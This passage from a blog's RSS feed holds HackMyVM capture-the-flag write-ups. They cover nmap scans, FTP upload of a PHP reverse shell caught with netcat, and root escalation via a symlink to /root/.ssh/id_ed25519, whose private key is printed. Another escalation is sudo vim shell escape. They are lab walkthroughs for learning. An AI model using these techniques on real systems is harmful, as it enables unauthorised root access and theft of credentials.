-rw-r--r-- 1 matthew matthew 3526 23 janv. 07:51 .bashrc
drwx------ 3 matthew matthew 4096 23 janv. 08:04 .config
drwxr-xr-x 3 matthew matthew 4096 23 janv. 08:04 .local
-rw-r--r-- 1 matthew matthew  807 23 janv. 07:51 .profile
-rw-r--r-- 1 matthew matthew    0 28 janv. 19:54 typescript
-rwx------ 1 matthew matthew   33 23 janv. 07:53 user.txt
matthew@debian:~$ toilet -f mono12 -F metal hackmyvm.eu
                                                                              
 ▄▄                            ▄▄                                             
 ██                            ██                                             
 ██▄████▄   ▄█████▄   ▄█████▄  ██ ▄██▀   ████▄██▄  ▀██  ███  ██▄  ▄██  ████▄██▄ 
 ██▀   ██   ▀ ▄▄▄██  ██▀    ▀  ██▄██     ██ ██ ██   ██▄ ██    ██  ██   ██ ██ ██ 
 ██    ██  ▄██▀▀▀██  ██        ██▀██▄    ██ ██ ██    ████▀    ▀█▄▄█▀   ██ ██ ██ 
 ██    ██  ██▄▄▄███  ▀██▄▄▄▄█  ██  ▀█▄   ██ ██ ██     ███      ████    ██ ██ ██ 
 ▀▀    ▀▀   ▀▀▀▀ ▀▀    ▀▀▀▀▀   ▀▀   ▀▀▀  ▀▀ ▀▀ ▀▀     ██        ▀▀     ▀▀ ▀▀ ▀▀ 
                                                    ███                       
                                                                              
                                                                              
                                                                              
                                                                              
            ▄████▄   ██    ██                                                 
           ██▄▄▄▄██  ██    ██                                                 
           ██▀▀▀▀▀▀  ██    ██                                                 
    ██     ▀██▄▄▄▄█  ██▄▄▄███                                                 
    ▀▀       ▀▀▀▀▀    ▀▀▀▀ ▀▀                                                 
                                                                              
                                                                              
matthew@debian:~$ exit
exit

Script terminé sur 2023-01-28 19:54:37+01:00 [COMMAND_EXIT_CODE='0']
                                                                         
```

Nothing useful for now; continue reconnaissance.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_uvalde.html</guid><pubDate>Sat, 08 Feb 2025 10:55:33 +0000</pubDate></item><item><title>hmv_w140</title><link>https://7r1UMPH.github.io/post/hmv_w140.html</link><description># 0. Introduction

Target machine: https://hackmyvm.eu/machines/machine.php?vm=W140
 Difficulty: Green
 Target IP: 192.168.205.131
 Local IP: 192.168.205.128

# 1. Scanning

Start with nmap.

```
┌──(kali㉿kali)-[~/test]
└─$ nmap -A -Pn -n --min-rate 10000 192.168.205.131
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-08 09:45 CST
Nmap scan report for 192.168.205.131
Host is up (0.00029s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 ff:fd:b2:0f:38:88:1a:44:c4:2b:64:2c:d2:97:f6:8d (RSA)
|   256 ca:50:54:f7:24:4e:a7:f1:06:46:e7:22:30:ec:95:b7 (ECDSA)
|_  256 09:68:c0:62:83:1e:f1:5d:cb:29:a6:5e:b4:72:aa:cf (ED25519)
80/tcp open  http    Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: w140
MAC Address: 08:00:27:EA:A7:DE (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.29 ms 192.168.205.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds
```

# 2. Reconnaissance

![image-20250331185843031](https://cdn.jsdelivr.net/gh/7r1UMPH/7r1UMPH.github.io@main/static/image/20250331185843370.png)

There is an upload page at /service.html; let's upload a webshell and see.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_w140.html</guid><pubDate>Sat, 08 Feb 2025 10:55:33 +0000</pubDate></item><item><title>hmv_Medusa</title><link>https://7r1UMPH.github.io/post/hmv_Medusa.html</link><description># 0. Introduction

Target machine: https://hackmyvm.eu/machines/?v=Medusa
 Difficulty: Green
 Target IP: 192.168.205.145
 Local IP: 192.168.205.128

# 1. Scanning

Start with nmap.

```
┌──(kali㉿kali)-[~/test]
└─$ nmap -A -Pn -n --min-rate 10000 192.168.205.145
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-04 17:42 CST
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for 192.168.205.145
Host is up (0.00026s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 70:d4:ef:c9:27:6f:8d:95:7a:a5:51:19:51:fe:14:dc (RSA)
|   256 3f:8d:24:3f:d2:5e:ca:e6:c9:af:37:23:47:bf:1d:28 (ECDSA)
|_  256 0c:33:7e:4e:95:3d:b0:2d:6a:5e:ca:39:91:0d:13:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.54 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.54 (Debian)
MAC Address: 08:00:27:5D:E9:45 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.26 ms 192.168.205.145

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.08 seconds
                                                           
```

# 2. Reconnaissance

```
┌──(kali㉿kali)-[~/test]
└─$ ftp 192.168.205.145
Connected to 192.168.205.145.
220 (vsFTPd 3.0.3)
Name (192.168.205.145:kali): anonymous
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed
ftp&gt; 
ftp&gt; exit
221 Goodbye.
```

Login not allowed, so let's look at port 80 instead.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_Medusa.html</guid><pubDate>Tue, 04 Feb 2025 10:55:33 +0000</pubDate></item><item><title>panghu</title><link>https://7r1UMPH.github.io/post/panghu.html</link><description>A privilege escalation challenge from a groupmate.

![image-20250331190451295](https://cdn.jsdelivr.net/gh/7r1UMPH/7r1UMPH.github.io@main/static/image/20250331190451337.png)

```
┌──(kali㉿kali)-[~/test]
└─$ sudo arp-scan -l     
[sudo] kali 的密码：
Interface: eth0, type: EN10MB, MAC: 00:0c:29:64:60:b9, IPv4: 192.168.205.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.205.1   00:50:56:c0:00:08       VMware, Inc.
192.168.205.2   00:50:56:f4:ef:6f       VMware, Inc.
192.168.205.147 08:00:27:86:a6:d2       PCS Systemtechnik GmbH
192.168.205.254 00:50:56:fb:6e:be       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.975 seconds (129.62 hosts/sec). 4 responded
                                                                                                                                    
┌──(kali㉿kali)-[~/test]
└─$ ssh ssh@192.168.205.147
The authenticity of host '192.168.205.147 (192.168.205.147)' can't be established.
ED25519 key fingerprint is SHA256:tkz/GarJpLwrGFZmgpweGf70u9znUcXycaHKGhfPRCc.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:3: [hashed name]
    ~/.ssh/known_hosts:8: [hashed name]
    ~/.ssh/known_hosts:9: [hashed name]
    ~/.ssh/known_hosts:10: [hashed name]
    ~/.ssh/known_hosts:11: [hashed name]
    ~/.ssh/known_hosts:12: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.205.147' (ED25519) to the list of known hosts.
ssh@192.168.205.147's password: 
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See &lt;https://wiki.alpinelinux.org/&gt;.

You can setup the system with the command: setup-alpine

You may change this message by editing /etc/motd.

jan:~$ sudo -l
[sudo] password for ssh: 
Matching Defaults entries for ssh on jan:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for ssh:
    Defaults!/usr/sbin/visudo env_keep+='SUDO_EDITOR EDITOR VISUAL'

User ssh may run the following commands on jan:
    (root) PASSWD: /opt/lzh.sh
jan:~$ cat /opt/lzh.sh 
#!/bin/sh

cd /home/ssh
cat backup/hi
jan:~$ cd /home/ssh/backup/
jan:~/backup$ ls -al
total 12
drwxr-xr-x    2 root     root          4096 Feb  3 23:28 .
drwxr-sr-x    3 ssh      ssh           4096 Feb  3 23:27 ..
-rw-------    1 root     root             9 Feb  3 23:28 hi
```

We can see that we have permission to modify the directory, but not to delete it.

```
jan:~/backup$ cd ..
jan:~$ ls -la
total 12
drwxr-sr-x    3 ssh      ssh           4096 Feb  3 23:27 .
drwxr-xr-x    3 root     root          4096 Jan 28 09:08 ..
lrwxrwxrwx    1 root     ssh              9 Jan 28 09:27 .ash_history -&gt; /dev/null
drwxr-xr-x    2 root     root          4096 Feb  3 23:28 backup
jan:~$ mv backup/ backup1
jan:~$ mkdir backup
jan:~$ cd backup
jan:~$ cd backup
jan:~/backup$ ln -s /root/root.txt hi
jan:~/backup$ sudo /opt/lzh.sh 
flag{LingMj}
```

Then I went to read the key and shadow. I assumed that no id_rsa meant there was no key, so I didn't look. Who knew...

![image-20250331190502904](https://cdn.jsdelivr.net/gh/7r1UMPH/7r1UMPH.github.io@main/static/image/20250331190503009.png)

Haha, I'm so silly.

```
jan:~/backup$ rm hi 
jan:~/backup$ sudo /opt/lzh.sh 
#       $OpenBSD: sshd_config,v 1.104 2021/07/02 05:11:21 dtucker Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

# Include configuration snippets before processing this file to allow the
# snippets to override directives set in this file.
Include /etc/ssh/sshd_config.d/*.conf

#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
PermitRootLogin yes
strictModes yes
#MaxAuthTries 6
#MaxSessions 10

#PubkeyAuthentication yes

# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
# but this is overridden so installations will only check .ssh/authorized_keys
AuthorizedKeysFile      ~/.ssh/authorized_keys

#AuthorizedPrincipalsFile none

#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!
#PasswordAuthentication yes
#PermitEmptyPasswords no

# Change to no to disable s/key passwords
#KbdInteractiveAuthentication yes

# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the KbdInteractiveAuthentication and
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication via KbdInteractiveAuthentication may bypass
# the setting of 'PermitRootLogin prohibit-password'.
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and KbdInteractiveAuthentication to 'no'.
#UsePAM no

#AllowAgentForwarding yes
# Feel free to re-enable these if your use case requires them.
AllowTcpForwarding no
GatewayPorts no
X11Forwarding no
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
#PrintMotd yes
#PrintLastLog yes
#TCPKeepAlive yes
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none

# no default banner path
#Banner none

# override default of no subsystems
Subsystem       sftp    internal-sftp

# Example of overriding settings on a per-user basis
#Match User anoncvs
#       X11Forwarding no
#       AllowTcpForwarding no
#       PermitTTY no
#       ForceCommand cvs server
jan:~/backup$ rm hi 
jan:~/backup$ ln -s /root/.ssh/id_ed25519 hi
jan:~/backup$ sudo -l
[sudo] password for ssh: 
Matching Defaults entries for ssh on jan:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for ssh:
    Defaults!/usr/sbin/visudo env_keep+='SUDO_EDITOR EDITOR VISUAL'

User ssh may run the following commands on jan:
    (root) PASSWD: /opt/lzh.sh
jan:~/backup$ sudo /opt/lzh.sh
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACCAgk7/Vhj9T7n/TV+eQ4icHmJy/M+Jp07erN+pcUwzjgAAAJB2iiMQdooj
EAAAAAtzc2gtZWQyNTUxOQAAACCAgk7/Vhj9T7n/TV+eQ4icHmJy/M+Jp07erN+pcUwzjg
AAAEAUhlfWSQ4VtYPAVaPWXTsnbEFiir93k1A3Icbge7uj5oCCTv9WGP1Puf9NX55DiJwe
YnL8z4mnTt6s36lxTDOOAAAACHJvb3RAamFuAQIDBAU=
-----END OPENSSH PRIVATE KEY-----
jan:~/backup$ nano id
jan:~/backup$ cat id 
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACCAgk7/Vhj9T7n/TV+eQ4icHmJy/M+Jp07erN+pcUwzjgAAAJB2iiMQdooj
EAAAAAtzc2gtZWQyNTUxOQAAACCAgk7/Vhj9T7n/TV+eQ4icHmJy/M+Jp07erN+pcUwzjg
AAAEAUhlfWSQ4VtYPAVaPWXTsnbEFiir93k1A3Icbge7uj5oCCTv9WGP1Puf9NX55DiJwe
YnL8z4mnTt6s36lxTDOOAAAACHJvb3RAamFuAQIDBAU=
-----END OPENSSH PRIVATE KEY-----
jan:~/backup$ chmod 600 id 
jan:~/backup$ ssh -i id root@127.0.0.1
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ED25519 key fingerprint is SHA256:tkz/GarJpLwrGFZmgpweGf70u9znUcXycaHKGhfPRCc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '127.0.0.1' (ED25519) to the list of known hosts.
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See &lt;https://wiki.alpinelinux.org/&gt;.

You can setup the system with the command: setup-alpine

You may change this message by editing /etc/motd.

jan:~# id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
```

&lt;!-- ##{'timestamp':1738666533}## --&gt;。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/panghu.html</guid><pubDate>Tue, 04 Feb 2025 10:55:33 +0000</pubDate></item><item><title>hmv_friendly</title><link>https://7r1UMPH.github.io/post/hmv_friendly.html</link><description># 0. Introduction

Target machine: https://hackmyvm.eu/machines/machine.php?vm=Friendly
 Difficulty: Green
 Target IP: 192.168.205.129
 Local IP: 192.168.205.128

# 1. Scanning

Start with nmap.

```
┌──(kali㉿kali)-[~/test]
└─$ nmap -sT -Pn -n -p- --min-rate 10000 192.168.205.129  
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-03 12:26 CST
Nmap scan report for 192.168.205.129
Host is up (0.00059s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 1.10 seconds
```

# 2. Reconnaissance

First, try anonymous FTP login.

```
┌──(kali㉿kali)-[~/test]
└─$ ftp 192.168.205.129
Connected to 192.168.205.129.
220 ProFTPD Server (friendly) [::ffff:192.168.205.129]
Name (192.168.205.129:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp&gt; ls -la
229 Entering Extended Passive Mode (|||17885|)
150 Opening ASCII mode data connection for file list
drwxrwxrwx   2 root     root         4096 Mar 11  2023 .
drwxrwxrwx   2 root     root         4096 Mar 11  2023 ..
-rw-r--r--   1 root     root        10725 Feb 23  2023 index.html
```

This matches the web root directory structure we found, so we can try uploading a reverse shell and then accessing it.

```
ftp&gt; put php.php 
local: php.php remote: php.php
229 Entering Extended Passive Mode (|||22559|)
150 Opening BINARY mode data connection for php.php
100% |*****************************************************************************************|  2596      255.89 KiB/s    00:00 ETA
226 Transfer complete
2596 bytes sent in 00:00 (241.58 KiB/s)
ftp&gt; ls
229 Entering Extended Passive Mode (|||7798|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 root     root        10725 Feb 23  2023 index.html
-rw-r--r--   1 ftp      nogroup      2596 Feb  3 04:32 php.php
226 Transfer complete
```

Request the uploaded file

```
┌──(kali㉿kali)-[~/test]
└─$ nc -lvnp 8888
listening on [any] 8888 ...
connect to [192.168.205.128] from (UNKNOWN) [192.168.205.129] 35158
Linux friendly 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64 GNU/Linux
 23:33:07 up 7 min,  0 users,  load average: 1.36, 6.63, 3.71
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (439): Inappropriate ioctl for device
bash: no job control in this shell
```

# 3. Getting a stable shell

After obtaining the reverse shell, use the following commands to get a stable interactive TTY shell:

```bash
script /dev/null -c bash   # spawn a pty-backed bash without writing a typescript file
# press Ctrl+Z to suspend the shell and return to the local terminal
stty raw -echo; fg         # put the local terminal in raw mode, then resume the remote shell
reset xterm
export TERM=xterm
echo $SHELL
export SHELL=/bin/bash
stty rows 59 cols 236      # match the size of your local terminal
```

# 4. Privilege escalation

```
www-data@friendly:/$ ls -la
total 68
drwxr-xr-x  18 root root  4096 Mar 11  2023 .
drwxr-xr-x  18 root root  4096 Mar 11  2023 ..
lrwxrwxrwx   1 root root     7 Feb 21  2023 bin -&gt; usr/bin
drwxr-xr-x   3 root root  4096 Feb 21  2023 boot
drwxr-xr-x  17 root root  3140 Feb  2 23:26 dev
drwxr-xr-x  69 root root  4096 Feb  2 23:26 etc
drwxr-xr-x   3 root root  4096 Feb 21  2023 home
lrwxrwxrwx   1 root root    31 Feb 21  2023 initrd.img -&gt; boot/initrd.img-5.10.0-21-amd64
lrwxrwxrwx   1 root root    31 Feb 21  2023 initrd.img.old -&gt; boot/initrd.img-5.10.0-18-amd64
lrwxrwxrwx   1 root root     7 Feb 21  2023 lib -&gt; usr/lib
lrwxrwxrwx   1 root root     9 Feb 21  2023 lib32 -&gt; usr/lib32
lrwxrwxrwx   1 root root     9 Feb 21  2023 lib64 -&gt; usr/lib64
lrwxrwxrwx   1 root root    10 Feb 21  2023 libx32 -&gt; usr/libx32
drwx------   2 root root 16384 Feb 21  2023 lost+found
drwxr-xr-x   3 root root  4096 Feb 21  2023 media
drwxr-xr-x   2 root root  4096 Feb 21  2023 mnt
drwxr-xr-x   2 root root  4096 Feb 21  2023 opt
dr-xr-xr-x 145 root root     0 Feb  2 23:26 proc
drwx------   3 root root  4096 Mar 11  2023 root
drwxr-xr-x  17 root root   540 Feb  2 23:26 run
lrwxrwxrwx   1 root root     8 Feb 21  2023 sbin -&gt; usr/sbin
drwxr-xr-x   2 root root  4096 Mar 11  2023 srv
dr-xr-xr-x  13 root root     0 Feb  2 23:26 sys
drwxrwxrwt   2 root root  4096 Feb  2 23:26 tmp
drwxr-xr-x  14 root root  4096 Feb 21  2023 usr
drwxr-xr-x  12 root root  4096 Feb 21  2023 var
lrwxrwxrwx   1 root root    28 Feb 21  2023 vmlinuz -&gt; boot/vmlinuz-5.10.0-21-amd64
lrwxrwxrwx   1 root root    28 Feb 21  2023 vmlinuz.old -&gt; boot/vmlinuz-5.10.0-18-amd64
www-data@friendly:/$ sudo -l
Matching Defaults entries for www-data on friendly:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on friendly:
    (ALL : ALL) NOPASSWD: /usr/bin/vim
```

![image-20250331191435274](https://cdn.jsdelivr.net/gh/7r1UMPH/7r1UMPH.github.io@main/static/image/20250331191435317.png)

🔗https://gtfobins.github.io/gtfobins/vim/#sudo

```
www-data@friendly:/$ sudo vim -c ':!/bin/sh'

# id
uid=0(root) gid=0(root) groups=0(root)
```

&lt;!-- ##{'timestamp':1738580133}## --&gt;。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_friendly.html</guid><pubDate>Mon, 03 Feb 2025 10:55:33 +0000</pubDate></item><item><title>Listen</title><link>https://7r1UMPH.github.io/post/Listen.html</link><description># 0. Introduction

This is a box built by a member of our group chat. I don't know whether he will publish it, so let's just take a look and learn from it.

Target IP: 192.168.205.137
 Local IP: 192.168.205.128

# 1. Scanning

Start with nmap

```
┌──(kali㉿kali)-[~/test]
└─$ nmap -A -Pn -n --min-rate 10000 192.168.205.137
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-03 13:15 CST
Nmap scan report for 192.168.205.137
Host is up (0.00021s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u4 (protocol 2.0)
| ssh-hostkey: 
|   2048 c2:91:d9:a5:f7:a3:98:1f:c1:4a:70:28:aa:ba:a4:10 (RSA)
|   256 3e:1f:c9:eb:c0:6f:24:06:fc:52:5f:2f:1b:35:33:ec (ECDSA)
|_  256 ec:64:87:04:9a:4b:32:fe:2d:1f:9a:b0:81:d3:7c:cf (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-title: \xE5\x87\x9B\xE5\x86\xBD\xE6\x99\x82\xE9\x9B\xA8 - \xE5\x85\xAC\xE5\xBC\x8F\xE3\x82\xA6\xE3\x82\xA7\xE3\x83\x96\xE3\x82\xB5\xE3\x82\xA4\xE3\x83\x88
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:97:BD:AA (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.22 ms 192.168.205.137

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.90 seconds
                                                                
```

# 2. Reconnaissance

![image-20250331190947415](https://cdn.jsdelivr.net/gh/7r1UMPH/7r1UMPH.github.io@main/static/image/20250331190947584.png)

Tested for file inclusion and got nothing, so let's start with directory brute-forcing

```
┌──(kali㉿kali)-[~/test]
└─$ feroxbuster -u http://192.168.205.137 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt -x php,html,md,txt
                                                                                                                                    
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben 'epi' Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.205.137
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, html, md, txt]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET       48l      102w     2359c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter                                                                                                                                   
403      GET        7l       10w      169c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter                                                                                                                                   
404      GET        7l       12w      169c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter                                                                                                                                   
200      GET        3l        1w       16c http://192.168.205.137/test.php
200      GET        2l        1w       17c http://192.168.205.137/tools.php
200      GET        1l        3w      228c http://192.168.205.137/README.md
200      GET        2l        1w       15c http://192.168.205.137/pp.php
```

Let's explore these

```
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.137/test.php                
&lt;h1&gt;test&lt;/h1&gt;


                                                                                                                                    
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.137/tools.php
&lt;h1&gt;tools&lt;/h1&gt;
 
                                                                                                                                    
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.137/pp.php   
&lt;h1&gt;test&lt;/h1&gt;

                                                                                                                                    
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.137/README.md
2025年1月22日　本プロジェクトの開発は一旦ここで終了です。
```</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Listen.html</guid><pubDate>Mon, 03 Feb 2025 10:55:33 +0000</pubDate></item><item><title>Happy New Year!</title><link>https://7r1UMPH.github.io/post/xin-nian-kuai-le-%EF%BC%81.html</link><description># Happy New Year!

In the new year, may you ride the east wind and break the waves, may your career flourish, and may your life be happy and fulfilling.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/xin-nian-kuai-le-%EF%BC%81.html</guid><pubDate>Wed, 29 Jan 2025 07:38:41 +0000</pubDate></item><item><title>About</title><link>https://7r1UMPH.github.io/about.html</link><description>&lt;!-- ##{'script':'&lt;script src='https://7r1umph.top/plugins/AboutMe.js'&gt;&lt;/script&gt;'}## --&gt;。</description><guid isPermaLink="true">https://7r1UMPH.github.io/about.html</guid><pubDate>Thu, 20 Mar 2025 13:25:46 +0000</pubDate></item><item><title>Friend Links</title><link>https://7r1UMPH.github.io/link.html</link><description>&lt;!-- ##{'script':'&lt;script src='https://7r1umph.top/plugins/FriendLinks.js'&gt;&lt;/script&gt;'}## --&gt;。</description><guid isPermaLink="true">https://7r1UMPH.github.io/link.html</guid><pubDate>Thu, 20 Mar 2025 13:26:17 +0000</pubDate></item></channel></rss>